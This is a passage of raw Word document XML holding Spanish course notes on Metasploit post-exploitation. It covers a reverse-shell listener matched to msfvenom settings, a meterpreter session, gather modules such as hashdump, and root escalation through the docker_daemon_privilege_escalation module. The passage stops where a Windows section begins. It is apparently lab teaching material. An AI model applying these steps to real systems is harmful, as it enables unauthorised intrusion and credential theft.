            <wp:effectExtent l="0" t="0" r="0" b="508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1042670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CDE2C0" w14:textId="50EB7170" w:rsidR="00171070" w:rsidRDefault="00171070" w:rsidP="002A7A47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recuerda que en Python hay que modificar todas las </w:t>
      </w:r>
      <w:r w:rsidRPr="00171070">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> por </w:t>
      </w:r>
      <w:r w:rsidRPr="00171070">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>\’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736BB1EC" w14:textId="7447E508" w:rsidR="00171070" w:rsidRDefault="00171070" w:rsidP="002A7A47">
      <w:r w:rsidRPr="00171070">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F04AA34" wp14:editId="2E25C6A8">
            <wp:extent cx="5400040" cy="2524760"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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524760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="052A5BB9" w14:textId="5263147C" w:rsidR="00AC01A0" w:rsidRDefault="00C60470" w:rsidP="002A7A47">
      <w:r w:rsidRPr="00C60470">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E15C744" wp14:editId="57EC3477">
            <wp:extent cx="6345047" cy="358140"/>
            <wp:effectExtent l="0" t="0" r="0" b="38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354631" cy="358681"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C925EE4" w14:textId="09901CF7" w:rsidR="00AC01A0" w:rsidRPr="00C60470" w:rsidRDefault="00AC01A0" w:rsidP="002A7A47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recuerda añadir </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC01A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>f‘ python -c “ (payload) “ ’</w:t>
      </w:r>
      <w:r w:rsidR="00C60470">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C60470" w:rsidRPr="00C60470">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¡Importante respetar los espacios!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2316BC" w14:textId="4C53157A" w:rsidR="001F1970" w:rsidRDefault="001F1970" w:rsidP="002A7A47">
      <w:r>
        <w:t>Asegúrate de leer las instrucciones del exploit y de completar sus campos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E08AD0" w14:textId="34C50DC6" w:rsidR="001F1970" w:rsidRDefault="001F1970" w:rsidP="001F1970">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001F1970">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17A39475" wp14:editId="798314E2">
            <wp:extent cx="3787468" cy="586791"/>
            <wp:effectExtent l="0" t="0" r="3810" b="38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87468" cy="586791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F989E5" w14:textId="27CC8FA6" w:rsidR="00C70EA2" w:rsidRDefault="00C70EA2" w:rsidP="002A7A47">
      <w:r>
        <w:t xml:space="preserve">Ahora en </w:t>
      </w:r>
      <w:r w:rsidRPr="00C70EA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> podemos poner un listener (/multi/handler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAFA92C" w14:textId="12679507" w:rsidR="00657CD4" w:rsidRDefault="00657CD4" w:rsidP="002A7A47">
      <w:r>
        <w:t>Recuerda configurar 3 cosas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACCE883" w14:textId="5C4B1FA7" w:rsidR="00657CD4" w:rsidRDefault="00657CD4" w:rsidP="00657CD4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lhost: Ip de la máquina (debe coincidir con el de msfvenom)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490A2382" w14:textId="7479BAB5" w:rsidR="00657CD4" w:rsidRDefault="00657CD4" w:rsidP="00657CD4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lport: Asegúrate de poner el mismo que en msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFCB7A6" w14:textId="6623B752" w:rsidR="00657CD4" w:rsidRDefault="00657CD4" w:rsidP="00657CD4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Payload: Pon el mismo payload usado en msfvenom, aunque no sea compatible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61192803" w14:textId="033CB09D" w:rsidR="00C70EA2" w:rsidRDefault="00657CD4" w:rsidP="002A7A47">
      <w:r w:rsidRPr="00657CD4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C2CEDD7" wp14:editId="4C886662">
            <wp:extent cx="5400040" cy="3714115"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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714115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A50391F" w14:textId="707630F9" w:rsidR="00657CD4" w:rsidRDefault="00657CD4" w:rsidP="002A7A47">
      <w:r>
        <w:t>Finalmente, ejecutamos el exploit desde otra consola:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0141AA43" w14:textId="45C58DBE" w:rsidR="00657CD4" w:rsidRDefault="00657CD4" w:rsidP="00657CD4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00657CD4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4FC4C1" wp14:editId="113BFF80">
            <wp:extent cx="3947502" cy="510584"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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47502" cy="510584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB8D5C" w14:textId="56A1AC81" w:rsidR="00657CD4" w:rsidRDefault="00657CD4" w:rsidP="00657CD4">
      <w:r>
        <w:t>Y abriremos un meterpreter en Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1363BFE9" w14:textId="4A5EF809" w:rsidR="00657CD4" w:rsidRDefault="00657CD4" w:rsidP="00657CD4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00657CD4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5086FE4B" wp14:editId="4CF76809">
            <wp:extent cx="5400040" cy="659130"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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659130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E5826" w14:textId="79BDF442" w:rsidR="00657CD4" w:rsidRDefault="003B051D" w:rsidP="00657CD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lo primero que debemos hacer una vez tengamos la sesión abierta es averiguar quien somos. Para ello usamos le comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="003B051D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07507AC5" w14:textId="5AEADD49" w:rsidR="003B051D" w:rsidRDefault="003B051D" w:rsidP="003B051D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003B051D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="081D4451" wp14:editId="65D296AA">
            <wp:extent cx="1653683" cy="320068"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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53683" cy="320068"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F381813" w14:textId="36FAB7AF" w:rsidR="003B051D" w:rsidRDefault="003B051D" w:rsidP="003B051D">
      <w:r>
        <w:t xml:space="preserve">Ahora necesitamos la utilización de módulos de </w:t>
      </w:r>
      <w:r w:rsidRPr="007571B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t>, se encuentran en la ruta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B65748F" w14:textId="01DED691" w:rsidR="003B051D" w:rsidRDefault="003B051D" w:rsidP="003B051D">
      <w:r w:rsidRPr="003B051D">
        <w:t>/usr/share/metasploit-framework</w:t>
      </w:r>
      <w:r>
        <w:t>/modules/post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC23A5B" w14:textId="39C20030" w:rsidR="003B051D" w:rsidRDefault="003B051D" w:rsidP="003B051D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003B051D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38A9AE4E" wp14:editId="75793FF1">
            <wp:extent cx="5400040" cy="164592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1645920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="000ABCD4" w14:textId="539C9F45" w:rsidR="003B051D" w:rsidRDefault="003B051D" w:rsidP="003B051D">
      <w:r>
        <w:t>En esta sección nos centraremos en Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96FA5A" w14:textId="628E176A" w:rsidR="003B051D" w:rsidRDefault="003B051D" w:rsidP="003B051D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003B051D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AEF6C39" wp14:editId="0E179529">
            <wp:extent cx="4000847" cy="80779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00847" cy="807790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00251F85" w14:textId="3BAAFC1C" w:rsidR="003B051D" w:rsidRDefault="003B051D" w:rsidP="003B051D">
      <w:r>
        <w:t>Estos módulos nos permiten obtener información una vez tenemos la máquina comprometida</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29968A4D" w14:textId="7A2D0B02" w:rsidR="003B051D" w:rsidRDefault="003B051D" w:rsidP="003B051D">
      <w:r>
        <w:t xml:space="preserve">Gather: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C46D6" w14:textId="0061219E" w:rsidR="003B051D" w:rsidRDefault="003B051D" w:rsidP="003B051D">
      <w:r w:rsidRPr="003B051D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AE7E1A8" wp14:editId="7711C936">
            <wp:extent cx="5400040" cy="491490"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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491490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43511DCE" w14:textId="5B43901A" w:rsidR="003B051D" w:rsidRDefault="003B051D" w:rsidP="003B051D">
      <w:r>
        <w:t xml:space="preserve">Para ejecutar alguno </w:t>
      </w:r>
      <w:r w:rsidRPr="003B051D">
        <w:t xml:space="preserve">usamos: </w:t>
      </w:r>
      <w:r w:rsidRPr="003B051D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run (ruta)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FC0ACA" w14:textId="7BE2A7CE" w:rsidR="003B051D" w:rsidRPr="003B051D" w:rsidRDefault="003B051D" w:rsidP="003B051D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B051D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run post/Linux/gather/checkvm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B960946" w14:textId="414C80F9" w:rsidR="003B051D" w:rsidRDefault="003B051D" w:rsidP="003B051D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003B051D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="706130FA" wp14:editId="5BA0C920">
            <wp:extent cx="3276884" cy="685859"/>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76884" cy="685859"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFCA31B" w14:textId="73EF78E2" w:rsidR="003B051D" w:rsidRDefault="006A21FD" w:rsidP="006A21FD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Checkvm: Testa si la máquina es una máquina virtual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1706C4B4" w14:textId="42E8B188" w:rsidR="006A21FD" w:rsidRDefault="006A21FD" w:rsidP="006A21FD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hashdump.rb: Hace un dump de los hash de la memoria (solo root).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C07D9" w14:textId="346FDFC7" w:rsidR="006A21FD" w:rsidRDefault="006A21FD" w:rsidP="006A21FD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enum_network: Obtiene información de la infraestructura de la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A5C849" w14:textId="44FD6512" w:rsidR="006A21FD" w:rsidRDefault="006A21FD" w:rsidP="006A21FD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enum_system: Enumera información del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481B3DD4" w14:textId="6A3C57A5" w:rsidR="006A21FD" w:rsidRDefault="006A21FD" w:rsidP="006A21FD"/>
    <w:p w14:paraId="27FB32E7" w14:textId="5F1918FD" w:rsidR="006A21FD" w:rsidRPr="006A21FD" w:rsidRDefault="006A21FD" w:rsidP="006A21FD">
      <w:r>
        <w:t xml:space="preserve">Ahora procederemos a escalar privilegios, lo primero que debemos saber es que podemos mandar la sesión de meterpreter en segundo plano para que no se pierda y poder seguir usando Metasploit con el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="006A21FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
      <w:r w:rsidRPr="006A21FD">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Con el comando sessions podríamos ver todas las sesiones activas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D693AE" w14:textId="746D8007" w:rsidR="006A21FD" w:rsidRDefault="006A21FD" w:rsidP="006A21FD">
      <w:r w:rsidRPr="006A21FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3224409D" wp14:editId="225D680D">
            <wp:extent cx="5400040" cy="114871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1148715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D58D6C" w14:textId="3D46D57E" w:rsidR="006A21FD" w:rsidRDefault="006A21FD" w:rsidP="006A21FD">
      <w:r>
        <w:t>Ahora vamos a acceder a un recomendador de exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61792AD9" w14:textId="696A53D6" w:rsidR="006A21FD" w:rsidRDefault="006A21FD" w:rsidP="006A21FD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A21FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1F1E6C" w14:textId="6C7FFA9F" w:rsidR="006A21FD" w:rsidRDefault="006A21FD" w:rsidP="006A21FD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A21FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C687C70" wp14:editId="2F124F7B">
            <wp:extent cx="5400040" cy="129984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1299845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE96E8" w14:textId="4D705F0C" w:rsidR="006A21FD" w:rsidRPr="001E52EF" w:rsidRDefault="001E52EF" w:rsidP="006A21FD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Seleccionamos la sesión con set </w:t>
      </w:r>
      <w:r w:rsidRPr="001E52EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>session (nº)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E52EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>y exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C4713" w14:textId="25DDC919" w:rsidR="001E52EF" w:rsidRPr="001E52EF" w:rsidRDefault="001E52EF" w:rsidP="001E52EF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E52EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Set session 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48787922" w14:textId="4F832C77" w:rsidR="001E52EF" w:rsidRPr="001E52EF" w:rsidRDefault="001E52EF" w:rsidP="001E52EF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E52EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23252E88" w14:textId="6AFB2A78" w:rsidR="001E52EF" w:rsidRDefault="001E52EF" w:rsidP="001E52EF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001E52EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26AEA1E9" wp14:editId="43A180FA">
            <wp:extent cx="5400040" cy="2527300"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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527300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40993900" w14:textId="13FDDE07" w:rsidR="001E52EF" w:rsidRDefault="001E52EF" w:rsidP="001E52EF">
      <w:r>
        <w:t xml:space="preserve">Nos quedaremos con </w:t>
      </w:r>
      <w:r w:rsidRPr="001E52EF">
        <w:t>exploit/linux/local/docker_daemon_privilege_escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B7469" w14:textId="63128234" w:rsidR="001E52EF" w:rsidRDefault="001B5109" w:rsidP="001E52EF">
      <w:r>
        <w:t>Como vemos es un local, lo que quiere decir que nosotros ya hemos debido de explotar la máquina previamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581A005F" w14:textId="16638265" w:rsidR="001B5109" w:rsidRDefault="001B5109" w:rsidP="001E52EF">
      <w:r>
        <w:t xml:space="preserve">Debemos buscar el exploit con </w:t>
      </w:r>
      <w:r w:rsidRPr="001B5109">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y posteriormente usar </w:t>
      </w:r>
      <w:r w:rsidRPr="001B5109">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para usarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31165F46" w14:textId="028E108C" w:rsidR="001B5109" w:rsidRDefault="001B5109" w:rsidP="001E52EF">
      <w:r w:rsidRPr="001B5109">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D082536" wp14:editId="15EA92E8">
            <wp:extent cx="5044440" cy="2313420"/>
            <wp:effectExtent l="0" t="0" r="381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66224" cy="2323410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D72A6" w14:textId="53719300" w:rsidR="001B5109" w:rsidRDefault="00AC16C8" w:rsidP="001E52EF">
      <w:r>
        <w:t>Como vemos, nos ha cambiado el payload, así que vamos a utilizar uno más parecido al nuestro:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4721481B" w14:textId="34DA8583" w:rsidR="00AC16C8" w:rsidRDefault="00AC16C8" w:rsidP="001E52EF">
      <w:r w:rsidRPr="00AC16C8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07A01FC6" wp14:editId="1EF840CC">
            <wp:extent cx="5400040" cy="38100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381000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E40BD4B" w14:textId="52378504" w:rsidR="00AC16C8" w:rsidRDefault="00AC16C8" w:rsidP="001E52EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">También introducimos la sesión con </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC16C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set session 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E74543" w14:textId="02AE4E26" w:rsidR="00AC16C8" w:rsidRDefault="00AC16C8" w:rsidP="001E52EF">
      <w:r>
        <w:t xml:space="preserve">Ahora, tras usar </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC16C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> abriremos meterpreter y habremos escalado privilegios como root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F8CC83" w14:textId="2ED32587" w:rsidR="006D7ED8" w:rsidRDefault="006D7ED8" w:rsidP="006D7ED8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006D7ED8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C78B261" wp14:editId="3D6034B7">
            <wp:extent cx="1348857" cy="365792"/>
            <wp:effectExtent l="0" t="0" r="381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348857" cy="365792"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07156AC8" w14:textId="19C5DF64" w:rsidR="008B25C9" w:rsidRDefault="008B25C9" w:rsidP="008B25C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00171070">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Meterpreter Post-explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5717BB92" w14:textId="7114E019" w:rsidR="008B25C9" w:rsidRDefault="008F189C" w:rsidP="008B25C9">
      <w:r>
